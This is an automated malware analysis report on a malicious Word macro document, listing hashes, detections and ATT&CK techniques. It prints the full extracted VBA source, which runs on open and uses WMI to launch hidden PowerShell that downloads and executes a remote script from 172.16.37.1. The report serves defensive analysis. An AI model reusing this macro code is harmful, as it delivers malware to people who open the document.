Office (OOXML) malware analysis — malicious · b6cf7695ba55fa46

MALICIOUS

Office (OOXML)

91.0 KB Created: 2014-09-08 08:26:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-02-04

MD5: 9a7a06e4124dc0cb0e9d987ec27e59cb SHA-1: c4b677115237f85d2e69a2205cb25a0cea283d45 SHA-256: b6cf7695ba55fa46b1da89ed450314a788720446fbd7ee674ba53c4f243ce621

358 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains VBA macros with Auto_Open and Document_Open functions that are triggered upon opening the document. These macros utilize WMI to launch a hidden PowerShell process. The PowerShell command attempts to download a payload from 'http://172.16.37.1/ps/ps.png' and execute it, indicating a downloader functionality.

Heuristics 9

ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
VBA project inside OOXML medium 6 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

        Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://172.16.37.1/ps/ps.png')); Invoke-ps", Null, objConfig, intProcessID
     End Function

VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Matched line in script
```
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
```

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Attribute VB_Customizable = True
Sub Document_Open()
Execute
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
End Sub
Sub Auto_Open()
Execute
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://172.16.37.1/ps/ps.png In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1851 bytes
SHA-256: `78357dac70c47ac8af65973d9c42a99f2f69d08d019bc13412acfa88d533f2c9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Execute End Sub Sub Auto_Open() Execute End Sub Public Function Execute() As Variant Const HIDDEN_WINDOW = 0 strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://172.16.37.1/ps/ps.png')); Invoke-ps", Null, objConfig, intProcessID End Function Attribute VB_Name = "NewMacros" Sub Auto_Open() Execute End Sub Public Function Execute() As Variant Const HIDDEN_WINDOW = 0 strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://172.16.37.1/ps/ps.png')); Invoke-ps", Null, objConfig, intProcessID End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	14848 bytes
SHA-256: `4737b4ecaf8f78035def20dd5938e5160844c976d43d9635702ac33146239ac1`
Detection ClamAV: Doc.Downloader.Pwshell-10001336-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.